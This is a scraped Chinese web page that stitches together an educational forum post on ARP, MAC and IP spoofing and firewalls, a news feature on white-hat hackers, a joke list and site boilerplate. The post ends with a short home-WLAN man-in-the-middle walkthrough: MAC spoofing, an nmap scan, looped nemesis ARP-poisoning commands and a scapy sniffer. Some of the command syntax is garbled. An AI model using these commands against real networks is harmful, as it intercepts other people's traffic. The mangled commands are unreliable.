黑客是怎样练成的么样练成的

分享到:这里是游戏解说的部分作品,全集请点击[]11.12.13.14.15.16.17.18.19.20.21.22.23.24.25. 今日看点关闭网络上的欺骗(黑客是如何炼成的) - 开源中国社区
当前访客身份:游客 [
当前位置:
首先,我们来被维基百科科普一下。然后试着执行一次中间人攻击。
理解计算机网络分层架构。
习惯于主动使用搜索引擎寻找知识
以下内容来自维基百科
Arp Spoofing
是一种攻击者在局域网上发送伪造的ARP消息的技术。通常是为了将另一个主机的IP地址关联到攻击者的MAC地址上。使那个主机的IP地址的流量定向到攻击者那里。
ARP欺骗使攻击者截取本地局域网(LAN)上的数据帧,更改流量或者阻止流量。通常作为其它攻击方式比如拒绝服务攻击(DOS),中间人攻击(MITM)或者会话劫持的开始。
攻击局限在使用ARP协议的局域网上。
局域网通信需要把网络层的IP地址转换成数据链路层的MAC地址来在数据链路层传输。当知道一个主机的IP地址后,就需要通过一个广播来获取其MAC地址(ARP request)。这个主机响应(ARP reply)中包含这个IP的MAC地址。
ARP协议没有状态,主机会自动缓存任何它们收到的ARP reply,无论是否它们请求过。即使没有过期的ARP缓存也会被新ARP响应覆盖。主机无法认证包的来源。
通常,一次ARP攻击可能来自被侵害的机器或者直接是攻击者的主机。通常,攻击的目标是将攻击者的MAC地址关联到目标机器的IP地址,于是意味着发送到目标的流量就被送到攻击者的那里。攻击者可以:
截取数据,然后原封不动转发给目标。(窃听)
更改数据内容再转发给目标(MITM)
通过丢弃所有或部分包对目标发起DOS攻击
防御措施有:
静态ARP表。
一些软件通过某种形式的认证或交叉检查ARP响应的方式。DHCP服务器、独立主机、Ethernet交换机或其它网络设备都能有这种功能。比如多IP关联到一个MAC地址可能就预示着ARP欺骗。
操作系统反应不一。Linux忽略任何不请自来的响应,但使用其它机器的可见请求来更新缓存。Solaris只在超时后更新缓存条目。Windows中,可以在HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, ArpCacheLife, ArpCacheMinReferenceLife, ArpUseEtherSNAP, ArpTRSingleRoute, ArpAlwaysSourceRoute, ArpRetryCount配置。
主机防御。可能拒绝任何和缓存中MAC地址不同的应答更新,可能接受不同的但会探测之前的MAC地址是否还在。这些是基于已有的缓存中MAC地址是合法的基础上。
被动探测。探测网络上的ARP请求和响应建立一个IP-MAC数据库
DHCP服务器在分配IP后建立和维护对应的列表供网关使用。
Mac Spoofing
是一种更改一个网络设备上接口的MAC(Media Access Control)地址的技术。MAC地址硬编码到网卡(NetWork Interface Controller)中无法更改,然而,有办法让操作系统相信网卡使用了用户指定的MAC地址。通常这更改了一个电脑的身份,然而相当简单。
通常为了绕过服务器或路由器的访问控制列表,或者隐藏一台电脑或者冒充其它网络设备。看情况有时候合法有时候非法。
为了在使用绑定MAC的ISP上使用新硬件或多个硬件。不过攻击者也能使用该技术。
为了满足某些绑定MAC地址的软件要求
身份隐藏以保护隐私。Wi-Fi连接MAC地址并不加密。因此monitor模式下网卡很容易搜集MAC地址。为了不被追踪可以使用MAC欺骗,然而攻击者可以用此技术冒充认证用户实行非法活动,并且难以探测。
MAC欺骗的主机通常可以收到信息(有些特别安全交换机配置可以阻止这种包的传输),然而,MAC地址伪造局限在局部广播域。
IP Spoofing
是在IP协议包中伪造源地址的一种行为。其一是为了隐藏伪造者的身份,一是为了假扮成其它机器。
攻击者通过更改IP包头源地址段,使之好像来源于其它机器。收到伪造包的机器就向错误的机器返回包。通常攻击者不在乎返回的包,或者他们可以可靠地探测响应。
特定情况下可能攻击者可以看到或把数据包重定向到他自己的机器。这在本地局域网或本地无线局域网上常常发生。
IP欺骗常用来进行DOS攻击,因为包来自不同地址,它让过滤变得不易。这让基于IP的防御不再有效。Backscatter是一种基于无效地址包的统计技术,然而更复杂的攻击还能避免无效的地址。
IP欺骗也被用来绕过基于IP的认证。虽然这种方法会一次更改上千的包使之在攻击远端系统时实施非常困难,但在受信任的内网机器之间却很有效。
IP欺骗有时候也用作网站性能测试。
易受IP欺骗的服务有:
任何基于IP的认证
X window系统
R(emote)系列服务比如rlogin,rsh
包过滤。网关对出口或者入口包进行IP地址过滤,比如urpf(unicast Reverse Path Forwarding)。
设计不是基于IP的网络协议和服务。
一些上层协议提供一些抵御。比如TCP使用序号来和远端机器通信来确保到达的包是已经建立连接的一部分。因攻击者通常看不到任何回应包,必须猜测序号来劫持连接。一些较老的系统或网络设备的TCP序号可以被预测。
Email Spoofing
以后再看,其实某次我们内网搭建的git服务器给我邮箱发了邮件并且收到时就想到了这个。
URL Spoofing
以后再说吧,想起了乌云上那篇猥琐流URL hacking。
从发展史来看,防火墙的发展分为三代:
包过滤。这一代防火墙仅仅对单个的包进行过滤。如果发现匹配的规则则丢弃(悄悄丢包)或者拒绝(返回错误)这个包。通常这些规则是包源地址、目的地址、协议、和比如针对TCP和UDP的端口。它没有关于连接的任何信息,是无状态的。
该代防火墙主要工作在下三层并稍微偷看下传输层的源和目的地址及端口。
有状态的过滤。不仅有第一代防火墙的功能,还工作到OSI第四层传输层上,会把连接状态作为一个评价标准。它会保留直到接受足够的包来决定它的连接状态。它记录所有经过的连接并决定是否一个包是新连接的开始或是已存在连接的一部分或者不是。
应用级防火墙这种防火墙工作在应用层。它能够理解上层协议,所以,可以去探测是否一个非法的协议在试图通过合法的端口穿越防火墙。传说中的下一代防火墙(NGFW)就是扩展和深化应用层栈的检查。
防火墙可以根据通信被截取的位置和被追踪的状态分类:
网络层或包过滤 主要工作在相对底层的TCP/IP层,靠规则过滤。有两种:
有状态:存储当前连接阶段,源目的地址端口。若一个包不属于已经存在的连接,通过新连接的规则评价它。如果一个包属于已知的连接,则按所在连接处理方式处理
无状态。需要更少内存、更快。适于处理无连接的协议。然而不能基于通信状态做出复杂决定。 一个例子就是iptables
应用层防火墙:通过套接字截取进程间通信,使用各种规则过滤。无法抵御底层的漏洞挖掘,正在被一种强制访问控制(MAC)应用防火墙取代,即沙盒。
代理:无论是专用的硬件或者软件,通过以应用的方式响应输入的包起作用。代理服务器是一个网络到另一个特定网络应用的网关,代表网络中的用户来行事。代理服务器使内网和外网隔离更彻底,但攻击者也可以通过使用一台机器当作代理攻击内部网络。
NAT——网络地址转换:防火墙通常有这些功能,防火墙后的机器通常拥有私有IP地址。本来用来减缓ipv4地址不够用的危机的措施,却意外成为一种反网络侦查的重要防御手段。
Rogue DHCP
伪造DHCP服务器,暂略。
放到DNS里来讲
下面,尝试一次中间人攻击,我是在WLAN内打开自己手机和笔记本。
0.0) mac spoofing
sudo ip link set eth0 down sudo ip link set dev eth0 address 38:AA:3C:E6:FE:69 ip link set eth0 up
ifconfig wlan0 promisc
echo 1 & /proc/sys/net/ipv4/ip_forward
1) 搜索目标
sudo nmap -sS 192.168.1.0/24
2) arp攻击
while true do sudo nemesis arp -v -r -d wlan0 -S 192.168.1.102 -D 192.168.1.1 -h E8:39:DF:08:F4:FB -m EC:88:8F:B4:D6:68 -H E8:39:DF:08:F4:FB -M EC:88:8F:B4:D6:68 sudo nemesis arp -v -r -d wlan0 -S 192.168.1.1 -D 192.168.1.102 -h E8:39:DF:08:F4:FB -m 68:5D:43:2E:AA:59 -H E8:39:DF:08:F4:FB -M 68:5D:43:2E:AA:59 done
pkts = sniff(filter=”tcp and host 192.168.1.102”,iface=”wlan0”,
prn=lambda x: sprintf(“{IP:%IP.src% -\& %IP.dst%\\n}{Raw:%Raw.load%\\n}”))
by& under GNU Free Documentation License 1.2
共有2个评论
<span class="a_vote_num" id="a_vote_num_
<span class="a_vote_num" id="a_vote_num_
你这个发博客会比较好一点。
更多开发者职位上
有什么技术问题吗?
justjav...的其它问题
类似的话题什么是白帽黑客?中国白帽黑客是怎么炼成的?
什么是白帽黑客?中国白帽黑客是怎么炼成的?
什么是白帽黑客?中国白帽黑客是怎么炼成的?
来源:北京本地宝整理报道
【导语】:12306的用户信息泄露漏洞、携程用户信息泄露漏洞……频发的系统漏洞隐患也让网络安全问题愈发受到关注。发现这些安全漏洞的,是一个被称为“白帽子”的群体。白帽子属于黑客,但是又在做着守护光明的事情。那么他们是怎么炼成的呢?
  什么是白帽黑客?白帽匿名者(white hathacker)又称为白帽子,测试网络和系统的性能来判定它们能够承受入侵的强弱程度。
  通常,白帽黑客攻击他们自己的系统,或被聘请来攻击客户的系统以便进行安全审查。
  “黑客”,本是一个褒义词,后来经媒体报道黑客事件后逐渐演化成干坏事的骇客。白帽黑客,就是不干坏事的黑客。他们专注发现漏洞但不做破坏,把漏洞告诉给网站管理员。与之相对的便是黑帽黑客。
  黑客广为人知却又自带神秘色彩。在人们的想像中,他们在键盘上十指舞动如飞,在倒计时读秒中攻破各种防火墙;或是随意入侵各个网站,留下“到此一游”的信息,是名副其实是“键盘侠”
  但在现实里,白帽子高手固然不少,但更多都是普通白帽子和入门级的初学者,那么,行内的高手白帽子是如何炼成的呢?
  自学成才
  很多白帽子都是读计算机方面的专业出身,也有不少是读信息安全对口专业的,但是绝大部分的人谈起自己如何成为一名白帽子,都说是自己“自学”的。
  1990年出生的阿正是补天平台(漏洞响应平台)的一位技术大牛,他最初接触黑客技术,始于上初中的时候。当时他的同桌买了一本黑客技术方面的杂志,阿正随手翻了翻,竟然一下子被里面的内容吸引了。不久之后,家里买了第一台电脑,他开始按照书中教的内容自己摸索捣腾。
  阿正高中的时候技术就已经有了相当的火候,他可以接管整个网吧,让自己能免费上网,还能看到所有人的浏览内容,离开的时候把所有的电脑都重启了,然后在一片惊呼声中扬长而去。
  阿锋是某知名网络安全公司的资深工程师。他中学没毕业就辍学了,由于从小玩电脑很在行,就去当了网管,然后就接触到了黑客技术。接着他自己通过黑客知识,在乌云网上提交漏洞,磨炼技艺,一步一步成为黑客界有名的大牛。
  阿正代表了大多数白帽子的经历,他们虽然学习计算机专业,可黑客技术都是自学而来的。学校里教授的知识偏重于理论,很少涉及黑客技术。大二的时候,连老师都要向他请教问题。
  谈及如何成为一名出色的白帽子,阿正表示,相比天赋,兴趣更加重要。在研究漏洞,解决问题所获得的成就实在太美妙了。他认为,自己能够成为白帽子里的佼佼者,是因为他把大量的精力和时间都花在了上面。
  培训班
  近年来,随着互联网时代的到来,信息安全的问题层出不断。与其他技术岗位相比较,信息安全这一领域的人才更加紧缺。而国内已经有人专门开培训班训练人才,培训真正的“白帽黑客”。
  导师王英键早已在白帽黑客界大名鼎鼎,人称“呆神”,这次他开办培训班,招募了全国不同省份的计算机少年。半年的时间,将只是略懂计算机网络安全技术的“小白”培养成具有一定水准的专业技术人员。他聘请了30多名业内大牛授课,学员每天要进行10到12个小时的高强度训练,学习计算机攻防及相关网络安全技术。在这过程中,学员们根据自己兴趣及老师建议细分到攻防渗透、安全分析研究、漏洞挖掘、智能硬件4个专业方向。
  据了解,现今国内顶级安全人才的年收入可以达到百万元水平,加入互联网公司的高技术水平白帽子年入十几万到二十万不等,即便是散兵游勇的白帽子,通过在平台上提交漏洞,也可以月入数万元。
  王英键表示:希望更多的年轻人能加入到“白帽子”中。
 五大白帽黑客
  黑客并非都是黑的,那些用自己的黑客技术来做好事的黑客们叫“白帽黑客”,这点和网络安全工程师的性质有点相同。大多数的普通黑客都是挂靠在安全公司,通过检测计算机系统安全性来谋生。
  Stephen Wozniak
  StephenWozniakWozniak和史蒂夫·乔布斯一起,是apple的联合创始人。他的黑客之旅也是源于盗打免费电话。他和乔布斯一起辍学做出apple第一代PC机,当时一共生产了100台一代苹果机,每台666.66美元。目前,Wozniak金盆洗手,专注于慈善事业。
  Tim Berners-Lee
  TimBerners-Lee提姆·伯纳斯·李是互联网之父,当他还是牛津大学的一名学生时就开始和同伴一起攻击,之后他被学校禁用电脑。他超意识地将超文本和TCP、DNS结合起来,诞生了WWW,进而在MIT成立了W3C.
  Linus Torvalds
  LinusTorvalds李纳斯·托沃兹是最优秀的类Unix系统——Linux之父。在1991年,在Minix操作系统基础上,他写出了Linux的内核,并邀请广大程序员们一起来完善代码。现在,Linux中仅有2%的代码是李纳斯自己写的。因为他的杰出工作,被斯德哥尔摩大学和赫尔辛基大学授予荣誉博士,时代周刊将其列入60年内最有影响力的人物之一。
  Richard Stallman
  RichardStallman斯多曼于1983年发起GNU计划,以开发一套完全自由的操作系统。当他还在MIT工作时,人们要求他们给计算机加上密码,而他和其他一些黑客认为口令系统是系统管理员控制用户的手段。于是后来他破解了用户们的密码,然后发邮件告诉他们,他破解了他们的密码,并告诉他们不如像他一样用回车键作为密码,更短也更方便。以此含蓄地告诉他们,所谓安全只是一个笑话。[1]另外一个请求打印机程序源代码以便修改却遭到拒绝的经历,让他更加坚定了走自由软件道路的信念。目前他活跃于多种反垄断活动中。
  Tsutomu Shimomura
  Tsutomu Shimomura下村勉的成名得益于著名的的黑帽黑客--KevinMitnick的一次攻击。这位日裔美籍安全专家,神乎其神地准确找到了Mitnick的准确位置。他与《纽约时报》 记者马可夫(JohnMarkoff)合著了一本书《纪实∶追捕美国头号电脑通缉犯──由追捕者自述》。
揭秘白帽黑客11字可概括:女的当男的使男的当狗使
  培训班是军事化管理,平时的上课时间手机不准带进教学区,学员们只有在晚上回到宿舍,才可以给家里打个电话。
  刘悦大学毕业后,放弃电力公司的工作,来到“女生当男生使”的特训班。半年下来,刘悦可以连做俯卧撑50个以上。
  1月14日,新朋和自己的两个小伙伴来到国内的某知名网络安全公司面试。新朋感觉面试过程还不错。
  导师王英键早已在白帽黑客界大名鼎鼎,人称“呆神”,这次他开办培训班,招募了全国不同省份的计算机少年。
  每天10个小时的上课时间,中午有些学员就把饭拿到工作台上来吃。
  曾颖涛的专业方向是无线安全和智能硬件,没事的时候,他自己也会琢磨一些电路板。前段时间,他和小伙伴利用自己制作的发射器,破解了三辆车的防盗系统,并做到了无限次开门。他们将漏洞提交,获得了上万元的报酬奖励。
发表评论:
馆藏&37450
TA的推荐TA的最新馆藏1、这么说,你想成为一名黑客
2、不错的志向,因为...
3、你需要弄一个很酷的面具,和一件笔挺的西装
4、如果你是一个火辣的女孩、并梳着一个男孩的发型,那就更好了
5、该死,这款发型也相当不错
6、找一个很小很小的墨镜
7、或者蛤蟆镜
8、墨镜对一个黑客来说非常非常的重要,不是吗?
9、想当黑客,你需要至少两台电脑
10、一个黑客可以把任何环境转变成工作室
11、黑客需要有一个非常隐蔽的藏身处,以防警察的抓捕
12、黑客对电脑的内部结构非常的了解
13、IE?NO,真正的黑客使用火狐浏览器
14、真正的黑客的电脑屏幕上的字都是绿色的
15、Linux?没错,真正的黑客使用Linux
16、黑客能够攻破防御系统、获取最高机密信息
17、别看错了,这些是黄牛党,不是黑客
18、这位一看就是黑客新手,很不专业
19、看看我,我可是在航天器里执行黑客任务
20、我的神呀,这个狐狸也是黑客
21、只有真的黑客能理解这张图
22、恭喜!你终于成为一名黑客了
23、开启你的黑客新生活吧!
关注微信下载离线手册1132人阅读
黑客是怎样炼成的(1)
要成为一名超级黑客,需要非常全面的计算机专业知识,这个流程图在网上偶然看到的,觉得概括得非常简洁而又全面。
我就偷下懒不用列出一大串文字出来了,这个图非常的直观。
技术交流QQ群:
尊重原创,转载请注明文章来源:
参考知识库
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
访问:15903次
排名:千里之外
转载:23篇
(1)(1)(23)}

我要回帖

更多关于 黑客是怎样练成的 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信